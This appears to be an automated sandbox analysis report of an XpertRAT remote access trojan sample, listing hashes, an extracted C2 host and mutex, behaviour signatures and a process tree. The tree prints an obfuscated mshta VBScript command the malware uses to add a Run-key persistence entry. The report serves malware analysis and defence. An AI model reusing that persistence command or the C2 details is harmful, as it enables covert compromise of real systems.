Overview

overview

10

Static

static

3

2235ed553b...17.exe

windows7-x64

10

2235ed553b...17.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27/01/2025, 13:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe

  • Size

    744KB

  • MD5

    6c6a9c70763f799ac9d4ca55a292c3f4

  • SHA1

    af4ebcfdd1624a077cd0f1a1c77f04076a974714

  • SHA256

    2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17

  • SHA512

    d21fc33c06169f58735333d95455636dfe0054021c884fa01df846d4bf0fd1085982475f47b0aba26ba782d66ce10317eadc34c6d3a28f8bd458c2ffda6231fc

  • SSDEEP

    12288:VzukkVr/MhE6JOA6lfHcb+L1LkUrzx0E+qKlR5yaMxTEaD:NhE6JOAiPVgUrCvR5yaMxTEaD

Score
10/10
xpertratgroupdefense_evasiondiscoverypersistencerattrojan

Malware Config

Extracted

Family

xpertrat

Version

3.1.9

Botnet

Group

C2

joeing.dnsfor.me:2011

Mutex

P4U8M5X3-N0E7-O7S5-B1Y3-J7Q6J4S0G6G5

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    defense_evasiontrojan
  • Windows security bypass 2 TTPs 1 IoCs
    defense_evasiontrojan
  • XpertRAT

    XpertRAT is a remote access trojan with various capabilities.

    ratxpertrat
  • XpertRAT Core payload 3 IoCs
  • Xpertrat family
    xpertrat
  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Windows security modification 2 TTPs 1 IoCs
    defense_evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    defense_evasiontrojan
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • System policy modification 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe
    "C:\Users\Admin\AppData\Local\Temp\2235ed553b50f5923d2594bf1d7a4fbc175ddf3e498b4aab995dfb289b775f17.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4104
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\:\Run\sprgekasser"" : myKey = ""HKCU\Software\Microsoft\Windows\X\Run\NOME"" : myKey=replace(myKey,"":"",""CurrentVersion"") : WshShell.RegWrite myKey,""C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"",""REG_SZ"" : window.close")
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2372
    • C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
      "C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4424
      • C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
        "C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe"
        3⤵
        • UAC bypass
        • Windows security bypass
        • Executes dropped EXE
        • Windows security modification
        • Checks whether UAC is enabled
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:456
        • C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
          C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
          4⤵
          • Adds policy Run key to start application
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1360

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\OPHAVSRETTEN.exe
    Filesize

    744KB

    MD5

    41116a2b3b3b0b088a773d7daa201e45

    SHA1

    c10e2a5e1f5278cb32772df1991d3a25dc2eeea8

    SHA256

    1ca110ac8fc54b08f016111bacb5590e7df1d00b10638a1e3690453630505c58

    SHA512

    dae78fd971904bcfc4e59f52be1caa7b6745c82f17b3beba727cd2b021babd72d2e8118b42e8ca697a383251e0c6e0e6560153e143cc6219e7ad7d9a0798270b

    Download Submit

  • memory/456-17-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

    Download

  • memory/456-19-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

    Download

  • memory/456-33-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

    Download

  • memory/1360-22-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

    Download

  • memory/1360-24-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

    Download

  • memory/1360-35-0x0000000000400000-0x0000000000444000-memory.dmp

    Filesize

    272KB

    Download

  • memory/4104-2-0x00000000779F1000-0x0000000077B11000-memory.dmp

    Filesize

    1.1MB

    Download

  • memory/4104-14-0x00000000779F1000-0x0000000077B11000-memory.dmp

    Filesize

    1.1MB

    Download